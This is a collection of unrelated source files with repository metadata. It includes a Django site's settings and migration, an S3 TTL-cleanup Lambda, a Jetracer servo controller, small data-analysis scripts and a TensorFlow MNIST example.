abb6be93dffa2f6d8a98a668d659cff04979017a
|
6ce7bb5f8e7b18e76b4a1a30191b8e326cbe3d6a
|
refs/heads/master
| 2020-11-24T21:20:29.883464 | 2019-12-19T05:03:53 | 2019-12-19T05:03:53 | 228,345,768 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 110 |
py
|
A, B = map(int, input().split())
K = (A + B) / 2
ans = int(K) if (A + B) % 2 == 0 else "IMPOSSIBLE"
print(ans)
|
[
"sasakigen11@gmail.com"
] |
sasakigen11@gmail.com
|
006fe964512bd31ae8ce8bffbf812f67aeeede45
|
63045bfda2cfa3b4908c62da8553c8ba9be7dd5c
|
/lambdas/s3ttl.py
|
0329336640da8edf768ab39d0eae32db8e2cde5a
|
[] |
no_license
|
chalfant/s3-ttl-lambda
|
9b75e02f31a85e3c30ea69099fc11c563190e8bc
|
68635c9b330fb76f5b940c76b8920fcce2168e7c
|
refs/heads/master
| 2020-07-28T06:12:35.470279 | 2019-09-17T22:23:48 | 2019-09-17T22:23:48 | 209,334,081 | 0 | 0 | null | 2019-09-18T14:49:39 | 2019-09-18T14:49:38 | null |
UTF-8
|
Python
| false | false | 1,158 |
py
|
import json
import boto3
import os
from datetime import datetime, tzinfo
# import pytz
# utc=pytz.UTC
BUCKET = os.environ['S3_BUCKET']
LOG_LEVEL = os.environ['LOG_LEVEL']
TTL_HOURS = os.environ['TTL_HOURS']
s3 = boto3.resource('s3')
bucket = s3.Bucket(BUCKET)
def conv_secs_to_hours(seconds):
return seconds/60/60
def should_delete(last_modified, ttl):
now = datetime.utcnow()
# print(f'\tnow - ts > ttl {now} - {last_modified} > {ttl}')
diff = now.replace(tzinfo=None) - last_modified.replace(tzinfo=None)
diffseconds = diff.total_seconds()
diffhours = conv_secs_to_hours(diffseconds)
# print(f'\tdiff hours: {diffhours}')
return diffhours > int(ttl)
def handler(event, context):
print(event)
object_summary_iterator = bucket.objects.all()
print('')
things_to_delete = []
for item in object_summary_iterator:
print(item)
# print(f'\tlast_modified: {item.last_modified}')
yesno = should_delete(item.last_modified, TTL_HOURS)
print(f'\tshould delete? {yesno}')
if yesno:
print(f'deleting {item.key} from {item.bucket}')
item.delete()
|
[
"rayjan.wilson@gmail.com"
] |
rayjan.wilson@gmail.com
|
fbe96a843221eda18802199f2e7ee8c93a84406a
|
33e021e80fa1a3f41845e118b2e1101072c3eb84
|
/bankroll.py
|
a7da19354e37f5052ab4e32e131e1db15eee65c6
|
[] |
no_license
|
haoyang1234/bitcoin
|
121034bf856551b9e2151078cbc684bab5c3ab23
|
532d3c2a06ca61b5ebdc0eeacf74eeea11bed4b6
|
refs/heads/master
| 2022-04-17T16:31:41.628981 | 2020-02-17T21:44:31 | 2020-02-17T21:44:31 | 239,562,412 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 903 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 10 14:13:51 2019
@author: Hao
"""
import os
import json
import glob
import numpy as np
import pandas as pd
total_pnl = []
name = []
folder1 = "C:\\Users\\Hao\\Desktop\\bitrepo\\Pumpdump&needlecatcher\\Pc-Po 99.5\\"
folder2 = "D:\\bitrepo\\Pumpdump&needlecatcher\\FebAplcsv\\"
result_folder = folder2 # CHANGE THIS TO ADJUST IT TO YOUR FOLDER
os.chdir(result_folder)
for file in glob.glob('*.csv'):
read_in_file = result_folder + file
pair_name = file
print(pair_name)
a = pd.read_csv(read_in_file) # reading CSV
pnl = a['pnl'].tolist()
total_pnl.append(pnl)
name.append(pair_name[:-4])
data_transposed = zip(total_pnl)
df = pd.DataFrame(total_pnl)
df = df.transpose()
total_sum = df.sum(axis=1, skipna=True)
a = total_sum[1372:]
N = 1440
daily = a.groupby(a.index // N).sum()
print('done')
|
[
"noreply@github.com"
] |
haoyang1234.noreply@github.com
|
2f183e94cac3a5db6b91056570d9c6600e246688
|
bc8ba705e38224681b359922c9a314bf8a9140d1
|
/tests/update_notify_cloudify_configuration/test_copy_ssl_cert.py
|
13b33817da6835be5c3dd636de4c9bd79b29b26d
|
[] |
no_license
|
cloudify-cosmo/cloudify-managed-nagios-plugin
|
14173b019c286a94be367d5d0a79c14b0f5a9413
|
1b9681130a78af5db2d60cb3996dc549d847ef6e
|
refs/heads/master
| 2023-08-01T13:35:27.623384 | 2022-12-01T19:11:36 | 2022-12-01T19:11:36 | 148,599,978 | 0 | 9 | null | 2023-04-09T14:53:41 | 2018-09-13T07:33:33 |
Python
|
UTF-8
|
Python
| false | false | 536 |
py
|
import mock
import tests.links.update_notify_cloudify_configuration as update_config
@mock.patch('tests.links.update_notify_cloudify_configuration.run')
def test_copy_cert(run):
expected_source_path = 'thepathwewant'
config = {
'something': 'yes',
'local_rest_cert_file': expected_source_path,
'other': 'no',
}
update_config.copy_ssl_cert(config)
run_args = run.call_args_list[0][0][0]
assert expected_source_path in run_args
assert update_config.NOTIFY_PLUGIN_CERT in run_args
|
[
"nobody@nowhere.local"
] |
nobody@nowhere.local
|
bb70c83fe48f0a14c8eb090192a8cc964f4e028c
|
049c4629c466676950bc0adcfd2690028297ba01
|
/DJANGO_MOVIE/movies/migrations/0001_initial.py
|
0f33aef5d89b6a16bbee878479dcabbd1d6dbec7
|
[] |
no_license
|
bernow/Python
|
2027a674d47dd1b3322c3678f1efa0082a742d5b
|
04aa7b5236047e076c76c07dfa98286c7e24ae64
|
refs/heads/master
| 2020-08-24T04:56:32.456972 | 2019-11-19T08:23:39 | 2019-11-19T08:23:39 | 216,765,571 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,516 |
py
|
# Generated by Django 2.2.6 on 2019-11-05 11:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Genre',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('audience', models.IntegerField()),
('poster_url', models.TextField()),
('description', models.TextField()),
('genre_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='movies.Genre')),
],
),
migrations.CreateModel(
name='Score',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=100)),
('score', models.IntegerField()),
('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='movies.Movie')),
],
),
]
|
[
"kok9591@naver.com"
] |
kok9591@naver.com
|
a4f65bb6a45b521a60fef3ecc1413da2148a87d7
|
26b134b48a5556baa0ab8c80dd030d07f3277a46
|
/tests/apps/python/web.py
|
b3e8ef72812a573a4b5a9005d8dccb9fbfa47032
|
[
"MIT"
] |
permissive
|
srr013/dokku
|
376ac5e6fcfce6ba38e11cbece2a2532c401ea35
|
81d31c9934b76d6898a5079f6ec4cb26f706c1ed
|
refs/heads/master
| 2023-01-27T11:31:25.061380 | 2020-12-02T19:19:07 | 2020-12-02T19:19:07 | 318,818,921 | 0 | 0 |
MIT
| 2020-12-05T15:14:36 | 2020-12-05T15:14:36 | null |
UTF-8
|
Python
| false | false | 510 |
py
|
import http.server
import os
class GetHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/plain; charset=utf-8")
self.end_headers()
self.wfile.write("python/http.server".encode("utf-8"))
if __name__ == "__main__":
port = int(os.getenv("PORT", 5000))
server = http.server.HTTPServer(("0.0.0.0", port), GetHandler)
print("Listening on port {0}".format(port))
server.serve_forever()
|
[
"email@josediazgonzalez.com"
] |
email@josediazgonzalez.com
|
e0a422afafd0c518668c019f26bccbc9e6a9bb01
|
6572f29c4472f1bd131dfb0fba441cb5b641ec83
|
/django/mysite_personal_models/blog/urls.py
|
6bdac35817b4968ca9cf7207271375c46c4feef1
|
[] |
no_license
|
kan-abhulimen/jango-training
|
1ccbe04c9f2f481d4482e9fdfd50b1a5b43cc7ae
|
734087392cd9635f00596a7955882f4849883930
|
refs/heads/master
| 2020-03-07T18:37:44.332426 | 2018-01-27T16:11:29 | 2018-01-27T16:11:29 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 545 |
py
|
from django.conf.urls import url, include
from django.views.generic import ListView, DetailView
from blog.models import Post
urlpatterns = [
url(r'^$', ListView.as_view(
queryset=Post.objects.all().order_by("-date")[:25],
template_name="blog/blog.html")),
url(r'^(?P<pk>\d+)$', DetailView.as_view(
model = Post,
template_name="blog/post.html")),
]
|
[
"mail_arunn@yahoo.com"
] |
mail_arunn@yahoo.com
|
c442740a0bcbc288556a64daa57037c8a3f469ab
|
d0326c87cda35a4c80d1bb137894a33ca3f1bcc9
|
/jetracer/nvidia_racecar.py
|
ec1631454f4df2f3fb9181022e6a30c9bf3caab6
|
[
"MIT"
] |
permissive
|
tokk-nv/jetracer
|
5a36fcf809348b609331d369d71cca20010c954a
|
e83f11522f75d5f89486442ce2e36624e20970a7
|
refs/heads/master
| 2023-07-03T21:58:25.670731 | 2021-08-09T23:33:58 | 2021-08-09T23:33:58 | 321,274,145 | 1 | 0 |
MIT
| 2021-06-01T20:47:28 | 2020-12-14T07:59:07 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,115 |
py
|
from .racecar import Racecar
import traitlets
from adafruit_servokit import ServoKit
class NvidiaRacecar(Racecar):
i2c_address = traitlets.Integer(default_value=0x40)
steering_gain = traitlets.Float(default_value=-0.65)
steering_offset = traitlets.Float(default_value=0)
steering_channel = traitlets.Integer(default_value=0)
throttle_gain = traitlets.Float(default_value=0.8)
throttle_channel = traitlets.Integer(default_value=1)
def __init__(self, *args, **kwargs):
super(NvidiaRacecar, self).__init__(*args, **kwargs)
self.kit = ServoKit(channels=16, address=self.i2c_address)
self.steering_motor = self.kit.continuous_servo[self.steering_channel]
self.throttle_motor = self.kit.continuous_servo[self.throttle_channel]
@traitlets.observe('steering')
def _on_steering(self, change):
self.steering_motor.throttle = change['new'] * self.steering_gain + self.steering_offset
@traitlets.observe('throttle')
def _on_throttle(self, change):
self.throttle_motor.throttle = change['new'] * self.throttle_gain
|
[
"jwelsh@nvidia.com"
] |
jwelsh@nvidia.com
|
50330e7bea315b129dabe997e0dca018f5f5629c
|
f2042aebec30039aaff5c0279f4c9a67e4f79709
|
/config/settings/production.py
|
19047261293b339500d314e16f023c54eec5f457
|
[] |
no_license
|
MarcyNash/django_website
|
c6f2f01a22755396d52b2452d025cc16bd986e03
|
dab5f5bc8c069d38624b2db71635733f4ef61363
|
refs/heads/master
| 2022-11-22T08:15:01.185312 | 2020-07-30T17:42:30 | 2020-07-30T17:42:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,282 |
py
|
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["pythonforthelab.com"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_DEFAULT_ACL = None
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# STATIC
# ------------------------
STATICFILES_STORAGE = "pftl.utils.storages.StaticRootS3Boto3Storage"
COLLECTFAST_STRATEGY = "collectfast.strategies.boto3.Boto3Strategy"
STATIC_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/static/"
# MEDIA
# ------------------------------------------------------------------------------
DEFAULT_FILE_STORAGE = "pftl.utils.storages.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[-1]["OPTIONS"]["loaders"] = [ # type: ignore[index] # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL", default="Python for the Lab <noreply@aquicarattino.com>"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env(
"DJANGO_EMAIL_SUBJECT_PREFIX", default="[Python for the Lab Website"
"]"
)
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
# https://anymail.readthedocs.io/en/stable/esps/mailgun/
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
"MAILGUN_API_URL": env("MAILGUN_API_URL", default="https://api.mailgun.net/v3"),
}
# Collectfast
# ------------------------------------------------------------------------------
# https://github.com/antonagestam/collectfast#installation
INSTALLED_APPS = ["collectfast"] + INSTALLED_APPS # noqa F405
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"filters": {"require_debug_false": {"()": "django.utils.log.RequireDebugFalse"}},
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"mail_admins": {
"level": "ERROR",
"filters": ["require_debug_false"],
"class": "django.utils.log.AdminEmailHandler",
},
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
},
},
"root": {"level": "INFO", "handlers": ["console"]},
"loggers": {
"django.request": {
"handlers": ["mail_admins"],
"level": "ERROR",
"propagate": True,
},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console", "mail_admins"],
"propagate": True,
},
},
}
# Your stuff...
# ------------------------------------------------------------------------------
BASE_URL = 'https://www.pythonforthelab.com'
MANAGERS = (
('Aquiles Carattino', 'aqui.carattino@gmail.com'),
)
FROM_EMAIL = 'aquiles@newsletter.pythonforthelab.com'
DEFAULT_FROM_EMAIL = 'aquiles@newsletter.pythonforthelab.com'
|
[
"aqui.carattino@gmail.com"
] |
aqui.carattino@gmail.com
|
d5abc58eeb91065258b67686a5ddda5d762661d7
|
0b8b683b9a0ff758c0c5e1d0a19f90751422618a
|
/@61_.py
|
c2756d3fe5794b77d43b1d79d7efc356909ce082
|
[] |
no_license
|
aushine/100_
|
29712674728eafce9f7bf9a95dd21552c48614be
|
36dd59aa88bc8eca720b654fd9ad3ce11bf61e5a
|
refs/heads/master
| 2020-04-30T23:28:19.836172 | 2019-03-22T13:27:03 | 2019-03-22T13:27:03 | 177,144,771 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 378 |
py
|
if __name__ == "__main__":
a =[]
for each in range(10):
a.append([])
for each_ in range(1, each+2):
a[each].append(1)
for i in range(2, 10):
for j in range(1, i):
a[i][j] = a[i-1][j-1]+a[i-1][j]
b = []
for each in a:
b.append(' '.join(map(str, each)))
for each in b:
print(each.center(26))
|
[
"161596610@qq.com"
] |
161596610@qq.com
|
fbdc9234549db3a006eb8b446d89f45360fb2362
|
3113b8fd9a0e74e8716ab1fb7bedc851d83c5183
|
/fiesta_family/settings.py
|
968060ca714c315fbd8d6f9e73a9d769f89f5717
|
[] |
no_license
|
ulank1/fiesta
|
478ad3866d3df35e502d60ddd703224fcf173ccf
|
71774598c5180a68c3e0ad75c7325a67ce1a72bc
|
refs/heads/master
| 2020-07-27T08:41:26.330154 | 2016-08-27T12:02:45 | 2016-08-27T12:02:45 | 66,712,427 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,909 |
py
|
"""
Django settings for fiesta_family project.
Generated by 'django-admin startproject' using Django 1.9.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
import dj_database_url
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*r^m0k%n@#i!tunwiware&8ujj9kjupfu^v)_cv3c#^t$z7@5g'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'post'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fiesta_family.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fiesta_family.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
|
[
"ulankarimov@mail.ru"
] |
ulankarimov@mail.ru
|
475728c282b849f2af54a99b7cb1b09018e8ffd4
|
bb0e580e3fd528ea5212f74eaab797116ff42ab9
|
/read_gps_speed.py
|
f9eb48a5af0f09d89218d7334bb6414acdda0dee
|
[] |
no_license
|
8n8/realbikenav
|
0676f41664ca56fe12fbe42b1ebeefe45dab3b8f
|
e493e2247b7e026c9aee3f2ed2c1cd8be6ce7d0f
|
refs/heads/master
| 2023-07-31T02:16:03.832891 | 2018-06-30T12:02:33 | 2018-06-30T12:02:33 | 405,713,661 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 330 |
py
|
""" It reads the GPS receiver and prints out its output. """
import serial # type: ignore
serial_port = serial.Serial('/dev/ttyACM0')
serial_port.baudrate = 115200
while True:
reading = serial_port.readline()
for line in reading.splitlines():
print(line)
if line[5:8] == 'VTG':
print(line)
|
[
""
] | |
5cc81a779ecee18c8ef0e63e12697bfe059f8bf0
|
e26d89b7e11f902fedb6642e9e4fe942105a1f1e
|
/LAB17/aluno.py
|
d334b2ca9af50221012b70a3e9bfa89c78cbcd3a
|
[] |
no_license
|
Marcos-Tonari-Diaz/MC102
|
8caed787a897e42a4bead1aa46f4d89dd8b028de
|
6482fa4ed09f103ed5757e7b76c202b1e5f85d9c
|
refs/heads/main
| 2023-03-01T02:29:25.506078 | 2021-02-02T00:24:50 | 2021-02-02T00:24:50 | 335,121,247 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
class Aluno:
def __init__(self, nome, ra, email, usuario, senha):
self.nome = nome
self.ra = ra
self.email = email
self.usuario = usuario
self.senha = senha
|
[
"marcos.dure.diaz@gmail.com"
] |
marcos.dure.diaz@gmail.com
|
47955f0cfeb6ad8ef9ded6bffccc8aa706933bee
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/5/l5d.py
|
d8160fd04b64e99d78c07839a70756ef5e92a3dc
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'l5D':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
|
[
"juliettaylorswift@gmail.com"
] |
juliettaylorswift@gmail.com
|
ec781f7631675e66a19b9c7c2f94e55d983f2331
|
46549aa548d7c367caf4f03dce97da373f71a299
|
/src/python/sandbox/checkin_times.py
|
ef9f62f79a4dc7340dc6d120bbb0e95ffa798193
|
[] |
no_license
|
rboberg/bodeza
|
6177b01c13c5b1a5e442f743014555667b98bf85
|
1b061fe10bb97d8d8f5f49c9ea5d86600fe4c7ae
|
refs/heads/master
| 2021-01-10T21:39:45.457763 | 2014-12-19T06:00:13 | 2014-12-19T06:00:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 863 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 09 19:33:59 2014
@author: Ross
"""
import os
import json
import pandas as pd
from ggplot import *
repo_dir = 'C:/Users/Ross/Documents/GitHub/bodeza'
data_dir = os.path.dirname(repo_dir) + '/bodeza_data'
fd = open(data_dir + '/yelp_data/yelp_academic_dataset_checkin.json')
data_list = []
for line in fd:
line_data = line.strip()
if line_data:
data_list.append(json.loads(line))
fd.close()
checkins = {}
for checkin in data_list:
for time, n in checkin['checkin_info'].iteritems():
if time in checkins:
checkins[time] += 1
else:
checkins[time] = 1
freq_dict = [dict(zip(['h','d','n'], ki.split('-')+[vi])) for ki, vi in checkins.iteritems()]
freq_df = pd.DataFrame(freq_dict)
print ggplot(freq_df, aes(x='h', y='n', colour='d')) + geom_line()
|
[
"ross.boberg@gmail.com"
] |
ross.boberg@gmail.com
|
e6334f2a64f9a1b31d53af7cad6ac3abe5758f7d
|
8cce0b5a4be09783016906a36192c52e9daa84aa
|
/cv_workshops/13-section/7-clazz.py
|
4640afbe5beea856e54129e53ebbe39d9916db00
|
[
"MIT"
] |
permissive
|
Castrol68/opencv-practice
|
fcc9495553d3a10fb045c396697391a5d2a06f36
|
83d76132d004ebbc96d99d34a0fd3fc37a044f9f
|
refs/heads/master
| 2023-08-31T07:18:51.497902 | 2020-05-03T17:43:12 | 2020-05-03T17:43:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,057 |
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
import tensorflow as tf
"""
TensorFlow - hello world
使用安装的TensorFlow 2.0并导入
"""
def main():
# 导入数据集, 数据集下载地址为: http://yann.lecun.com/exdb/mnist/
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# 将整数数据集转换为浮点数
x_train, x_test = x_train / 255.0, x_test / 255.0
# 搭建Sequential模型,并将数据堆叠起来
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# 训练
model.fit(x_train, y_train, epochs=5)
# 验证
model.evaluate(x_test, y_test)
if "__main__" == __name__:
main()
|
[
"afterloe@foxmail.com"
] |
afterloe@foxmail.com
|
6ec621dff6324b2822383c42b374ac54637d859a
|
dc72e1eb44cfaed330d9477d0c27bee307a81e4a
|
/Jackpointnew/hand/scripts.py
|
47913e46358e99f954ce1218749325896b5b7a09
|
[] |
no_license
|
bussiere/JackPointFInal
|
ba200d85606e17b423535af20a58c04bf5afa550
|
c414480fee519e68aece68068e941278fe10cf0a
|
refs/heads/master
